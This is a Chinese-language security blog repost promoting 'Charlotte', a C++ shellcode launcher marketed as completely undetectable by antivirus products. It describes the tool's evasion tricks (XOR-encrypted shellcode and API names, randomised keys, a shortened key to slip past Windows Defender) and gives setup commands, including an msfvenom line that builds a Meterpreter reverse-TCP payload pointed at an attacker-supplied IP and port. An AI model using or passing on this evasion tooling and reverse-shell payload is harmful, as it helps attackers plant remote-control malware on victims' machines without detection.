Charlotte:完全不会被检测到的Shellcode启动器

admin 2022年4月9日10:52:46评论70 views字数 850阅读2分50秒阅读模式

Charlotte:完全不会被检测到的Shellcode启动器

关于Charlotte

Charlotte是一款基于C++实现的Shellcode启动器,并且完全不会被安全解决方案所检测到。

工具特性

截止至2021年5月13日之前,该工具的检测结果为0/26;

该工具支持动态调用Win32 API函数;

对Shellcode和函数名进行异或加密;

每次运行随机化异或密钥和变量;

在Kali Linux上,只需运行“apt-get install mingw-w64*”即可;

支持随机字符串长度和异或密钥长度;

antiscan.me

Charlotte:完全不会被检测到的Shellcode启动器

工具使用

首先,我们需要使用git clone命令将该项目源码克隆至本地,并使用脚本工具生成Shellcode文件。具体操作示例如下:

git clone https://github.com/9emin1/charlotte.git && apt-get install mingw-w64*
cd charlotte
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$YOUR_IP LPORT=$YOUR_PORT -f raw > beacon.bin
python charlotte.py

使用msfvenom -p测试以及Cobalt Strike原始格式Payload

Charlotte:完全不会被检测到的Shellcode启动器

强化功能

很明显,Windows Defender是能够检测到.DLL代码的,但我们在POC中通过将16字节大小的异或密钥降低至9个字节,就可以规避检测了。

转自:freebuf


Charlotte:完全不会被检测到的Shellcode启动器


Charlotte:完全不会被检测到的Shellcode启动器

推荐阅读   

【入门教程】常见的Web漏洞--XSS

【入门教程】常见的Web漏洞--SQL注入

sql注入--入门到进阶

短信验证码安全常见逻辑漏洞

最全常见Web安全漏洞总结及推荐解决方案

常见的Web应用的漏洞总结(原理、危害、防御)

代码审计常见漏洞总结

Web安全漏洞的靶场演示

13 款 Linux 比较实用的工具

xss攻击、绕过最全总结


Charlotte:完全不会被检测到的Shellcode启动器

   学习更多技术,关注我:   

觉得文章不错给点个‘再看’吧

原文始发于微信公众号(编码安全研究):Charlotte:完全不会被检测到的Shellcode启动器

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月9日10:52:46
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Charlotte:完全不会被检测到的Shellcode启动器https://cn-sec.com/archives/889198.html

发表评论

匿名网友 填写信息